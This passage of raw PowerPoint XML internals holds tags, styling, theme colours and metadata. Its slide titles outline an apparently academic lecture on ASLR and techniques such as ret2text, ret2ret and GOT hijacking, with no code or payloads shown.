  <p:tag name="DVSECTIONID" val="umPDgIar2dl070AjYqEir2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag177.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="NGe94nqGbWfXZqkkVCh9ln"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag178.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="tPpvYWPFPvory8p7DN0l1o"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag179.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="La0aYDu11iGqcoKzouQv7K"/>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67.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68.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69.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0.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71.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72.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3.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74.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75.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76.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77.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78.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79.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80.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81.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82.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83.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84.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85.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86.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87.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88.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89.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90.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91.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92.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93.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94.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95.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96.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97.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98.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99.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0000" dist="23000" dir="5400000" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="35000"/>
            </a:srgbClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="28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emplate">
  <a:themeElements>
    <a:clrScheme name="Custom 3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFE"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="990000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFE"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A32D1F"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47932"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A32D1F"/>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0000" dist="23000" dir="5400000" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="35000"/>
            </a:srgbClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="28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4300</TotalTime>
  <Words>2317</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>620</Paragraphs>
  <Slides>52</Slides>
  <Notes>31</Notes>
  <HiddenSlides>2</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52</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="65" baseType="lpstr">
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Monaco</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>template</vt:lpstr>
      <vt:lpstr>1_template</vt:lpstr>
      <vt:lpstr>Address Space Layout Randomization (ASLR)</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>ASLR</vt:lpstr>
      <vt:lpstr>Running cat Twice</vt:lpstr>
      <vt:lpstr>Memory</vt:lpstr>
      <vt:lpstr>ASLR Randomization</vt:lpstr>
      <vt:lpstr>ASLR Scorecard</vt:lpstr>
      <vt:lpstr>Ubuntu - ASLR</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>Brute Force</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>ret2text</vt:lpstr>
      <vt:lpstr>ret2text</vt:lpstr>
      <vt:lpstr>Function Pointer Subterfuge </vt:lpstr>
      <vt:lpstr>Function Pointers</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>ret2eax</vt:lpstr>
      <vt:lpstr>ret2eax</vt:lpstr>
      <vt:lpstr>ret2ret</vt:lpstr>
      <vt:lpstr>ret2ret (stack juggling)</vt:lpstr>
      <vt:lpstr>ret2pop</vt:lpstr>
      <vt:lpstr>ret2ret / ret2pop</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>Other Non-randomized Sections</vt:lpstr>
      <vt:lpstr>Dynamic Linking</vt:lpstr>
      <vt:lpstr>Dynamic Linking</vt:lpstr>
      <vt:lpstr>Dynamic Linking</vt:lpstr>
      <vt:lpstr>Exploiting the linking process</vt:lpstr>
      <vt:lpstr>GOT Hijacking</vt:lpstr>
      <vt:lpstr>GOT Hijacking</vt:lpstr>
      <vt:lpstr>GOT Hijacking</vt:lpstr>
      <vt:lpstr>How to attack with ASLR?</vt:lpstr>
      <vt:lpstr>Many other techniques</vt:lpstr>
      <vt:lpstr>The Security of ASLR</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>When to Randomize?</vt:lpstr>
      <vt:lpstr>Security Game for ASLR</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Scenario 1:  Not Randomized After Each Probe</vt:lpstr>
      <vt:lpstr>W/O Replacement: Pr[Success on Exactly nth try]</vt:lpstr>
      <vt:lpstr>W/O Replacement: Pr[Success on Exactly nth try]</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Expected Value</vt:lpstr>
      <vt:lpstr>Expected number of trials before success</vt:lpstr>
      <vt:lpstr>Scenario 2:  Randomized After Each Probe</vt:lpstr>
      <vt:lpstr>With Replacement Pr[Success on exactly nth try]</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Comparison</vt:lpstr>
      <vt:lpstr>But wait...</vt:lpstr>
      <vt:lpstr>? &amp;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Chao Zh</cp:lastModifiedBy>
  <cp:revision>1677</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-02T18:57:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-06T14:19:01Z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11L1CS3lWunNfTuci5gPLtht4ZjOn7gyfIKyZn-f7p20</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Google.Documents.RevisionId">
    <vt:lpwstr>13701622749194124332</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Google.Documents.PreviousRevisionId">
    <vt:lpwstr>17594234182614114890</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Google.Documents.PluginVersion">
    <vt:lpwstr>2.0.2424.7283</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Google.Documents.MergeIncapabilityFlags">
    <vt:i4>0</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="Google.Documents.Tracking">
    <vt:lpwstr>false</vt:lpwstr>
  </property>
</Properties>
</file>